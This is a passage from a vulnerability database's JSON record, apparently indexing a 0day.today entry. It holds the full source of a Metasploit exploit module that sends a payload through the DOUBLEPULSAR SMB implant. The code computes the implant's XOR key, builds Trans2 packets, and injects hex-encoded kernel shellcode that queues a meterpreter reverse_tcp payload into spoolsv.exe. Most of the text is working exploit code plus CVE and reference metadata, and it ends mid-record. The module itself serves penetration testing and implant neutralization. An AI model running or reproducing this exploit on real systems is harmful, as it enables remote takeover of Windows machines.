["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96704", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-10-21T22:28:12", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-10-21T22:28:12", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-23] #"}, "lastseen": "2021-10-23T18:17:17", "differentElements": ["sourceData"], "edition": 53}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "3d39c3aa4be25350cb1a1a9e60573505", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-23T22:15:43", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27802", "1337DAY-ID-33895"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:156196"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96704", "SMNTC-96709", "SMNTC-96705", "SMNTC-96703", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", 